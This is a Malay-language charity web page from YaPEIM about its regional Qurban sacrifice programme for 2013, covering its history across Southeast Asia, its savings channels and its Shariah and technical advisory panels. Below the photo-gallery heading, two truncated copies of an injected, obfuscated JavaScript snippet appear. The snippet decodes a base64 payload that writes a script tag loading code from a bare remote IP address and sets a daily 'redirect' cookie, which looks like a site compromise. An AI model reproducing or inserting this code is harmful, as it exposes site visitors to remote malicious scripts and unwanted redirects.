YaPEIM » Program Ibadah Korban YaPEIM 1434H / 2013

Terkini

Program Ibadah Korban YaPEIM 1434H / 2013

Program Serantau Ibadah Korban YaPEIM 1434H/ 2013

Skim Ibadah Korban YaPEIM adalah merupakan inisiatif baharu yang diperkenalkan oleh YaPEIM dalam usaha untuk menggerakkan semangat melaksanakan ibadah korban disamping memperkasakan ekonomi Ummah.

Selain daripada objektif yang telah digariskan, kewujudan skim ini secara tidak langsungnya adalah untuk menunjukkan kepada masyarakat bahawa impak daripada pelaksanaan ibadah ini, jika ditadbir dengan sistematik dan efisien mampu meningkatkan status sosial masyarakat.

Pengkorporatan Ibadah

Ini dibuktikan dengan kejayaan Lembaga Tabung Haji menguruskan Ibadah Haji (dana daripada pendeposit) mampu menyumbang kepada pertumbuhan ekonomi negara malah menjadi entiti rujukan kepada beberapa negara Islam yang lain. Begitu juga dengan Ibadah Zakat, Wakaf, Sedekah dan sebagainya meninggalkan impak yang tersendiri dalam masyarakat khususnya kepada umat Islam.

Berbekalkan kepada momentum kejayaan yang di kecapi melalui usaha ‘pengkorporatan’ ibadah-ibadah tersebut, tidak mustahil ibadah korban/ aqiqah ini juga mampu diangkat menjadi sebuah lagi mercu kepada wadah menjana ekonomi umat kelak. Signifikannya, ibadah korban ini jika diurus-tadbir dengan lebih sistematik dan terancang mampu mengumpul dana dan boleh menjana pertumbuhan perkhidmatan “up stream” dan “down stream” yang berkaitan.

Melalui aspek agihan juga, lebih ramai kumpulan sasar yang benar-benar memerlukan dan berkelayakan dapat menikmati hasil dari ibadah ini selain dapat menyeimbangkan status sosial dalam masyarakat; jurang antara yang miskin dan kaya dirapatkan, hubungan ukhuwah islamiyah sesama Islam dipertingkatkan dan akhirnya mewujudkan konsep negara “baldatun thoiyyibatun wa rabbul ‘qhafur”. iaitu  sebuah negara yang subur dan makmur, adil dan aman. Di mana yang berhak akan mendapat haknya, yang berkewajipan akan melaksanakan kewajipannya dan yang berbuat baik akan mendapat anugerah sebesar kebaikannya. Tidak ada lagi kezaliman.

Program Serantau Ibadah Korban YaPEIM

Program Serantau Ibadah korban YaPEIM adalah merupakan program tahunan yang diperkenalkan sejak 2007/1428. Program perintis tersebut diadakan dengan kerjasama di antara YaPEIM melalui Sekretariah Ar Rahnu Serantau dengan Cambodia Islamic Assosiation (CIA).  Berdasarkan kepada sambutan yang menggalakkan daripada masyarakat (penerima manfaat), program ini diperluaskan ke negara anggota sekretariat yang lain antaranya 2009 : Indonesia (Acheh dan Padang), 2011 : Filipina (Selatan Filipina); Malaysia (Perak), 2012 : Vietnam (Province Tay Ninh dan Ho Chi Minh); Thailand (Wilayah Pattani, Songkla, Yala dan Narathiwat) dan 2013 : Timor Leste (Dili, Los Parlos, Bancau, Same, Viqueque dan Liqucca. Manakala bagi Negara Thailand dan Malaysia diperluaskan ke beberapa wilayah/ negeri lain. Antaranya (Thailand) Wilayah Bangkok, Ayutthaya dan Chiang Mai dan (Malaysia) negeri Kedah, Perlis, Pulau Pinang, Pahang, Terengganu, kelantan, Negeri Sembilan, Melaka, Johor, Wilayah Persekutuan Kuala Lumpur, Selangor, Sabah dan Sarawak.

Sehingga kini, sejumlah 462 ekor binatang korban telah berjaya disumbangkan, yang melibatkan 6 buah negara. Manakala penerima manfaat telah mencecah hampir 15,000 orang.

Transformasi Ibadah Korban

Namun bermula tahun 2013, YaPEIM mengorak langkah ke hadapan untuk terus mengembangkan lagi syiar Islam dengan mentransformasikan ibadah korban menerusi pengenalan kemudahan tabungan melalui pelbagai saluran. Selain daripada menggunakan medium institusi kewangan sediaada, YaPEIM juga telah menawarkan saluran baharu bagi memudahkan masyarakat menyertai skim/ program ini iaitu melalui cawangan Ar Rahnu YaPEIM seluruh negara. Selain daripada membuat transaksi gadaian, kini masyarakat boleh juga membuat transaksi untuk ibadah korban dan aqiqah di kaunter tersebut. Dengan hanya membawa kad  pengenalan diri dan mengisi borang yang disediakan sudah melayakkan individu tersebut melaksanakan korban mengikut perancangan mereka sendiri. Dengan kaedah ini diharapkan mampu menggalakkan semua umat Islam termasuk yang kurang berkemampuan untuk sama-sama melaksanakan ibadah korban ini disamping meraih ganjaran yang telah dijanjikan.

Semenjak lima tahun lalu, eksperimen yang dijalankan menunjukkan bahawa disebalik penganjuran program ini, YaPEIM menyedari terdapat pelbagai elemen lain yang perlu diambilberat terutamanya berkaitan aspek penyembelihan, pengagihan secara optimum, kualiti haiwan ternakan, tempat pelaksanaan dan sebagainya. Justeru YaPEIM menyedari dengan permintaan penyertaan yang tinggi kelak pasti memerlukan jumlah kuantiti haiwan ternakan seperti lembu, kambing dan kerbau dalam kuantiti yang banyak dan berkualiti. Mungkin ketika itu perlu diwujudkan ladang ternakan haiwan, pusat penyembelihan, kursus teknik penyembelihan yang betul dan sebagainya.

Malah YaPEIM juga sedang membuat kajian berkaitan dengan cara penyembelihan haiwan korban dengan menggunakan teknologi terbaru iaitu menggunakan alat yang mampu memusingkan atau menterbalikkan haiwan tersebut tanpa perlu diikat. Kaedah ini bertepatan dengan tuntutan Islam yang menganjurkan supaya memperelokkan cara penyembelihan malah menyanggah tohmahan yang dilemparkan oleh segelintir masyarakat yang terus menerus mempersoalkan pelaksanaan ibadah korban di sisi Agama Islam.

 Membina keyakinan Masyarakat Terhadap Keupayaan YaPEIM

Usaha membina keyakinan dan ketelusan masyarakat terhadap skim ini terus diberi perhatian, pelbagai langkah sedang dijayakan antaranya mewujudkan Panel Penasihat (Dasar) dan Panel Penasihat Teknikal dan Pengawasan Operasi Skim Ibadah Korban YaPEIM. Tujuan pewujudan panel-panel ini adalah bagi memantau dan memastikan hala tuju skim ini sentiasa berada di landasan yang betul dan mencapai tahap profesionalisme pengurusan yang tinggi dalam pelaksanaannya. Pihak YaPEIM telah mengenal pasti tokoh-tokoh yang berkelayakan yang mewakili institusi- institusi atau entiti-entiti kerajaan yang mempunyai hubung kait dengan skim ini. Antaranya Jabatan Perkhidmatan Veterinar, Jabatan Kemajuan Islam Malaysia (JAKIM), Jabatan Peguam Negara, Jabatan Perkhidmatan Kuarantin & Pemeriksaan Malaysia (MAQIS) dan Anggota Sekretariat Ar Rahnu Serantau mewakili negara-negara anggota.

Selain daripada itu, aspek keagamaan juga tidak dikesampingkan. Khususnya bagi memastikan perjalanan skim  mengikut landasan dan lunas-lunas syariah. Hal ini diperkuatkan dengan penubuhan Panel Syariah (Khas) Ibadah Korban YaPEIM yang dipengerusikan oleh Y.Bhg. S.S Tan Sri Dato’ Seri Harussani bin Hj. Zakaria, Mufti Negeri Perak Darul Ridzuan. Manakala anggota Panel Syariah (Khas) ini adalah terdiri daripada S.S. Mufti Negeri-negeri di Malaysia yang terpilih. Antaranya Negeri Kedah, Pulau Pinang, Terengganu, Pahang, Kelantan dan Melaka.

Penutup

Sesungguhnya apa yang direncanakan itu pasti tidak mampu diterjemahkan andai tidak mendapat sokongan dari semua lapisan masyarakat. YaPEIM sangat mendambakannya bukan sekadar curahan idea dan tenaga tetapi titipan doa kudus penuh keinsafan dalam memastikan syiar Nabi Ibrahim ‘a.s ini terus dilestarikan.

Galeri Gambar

 

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top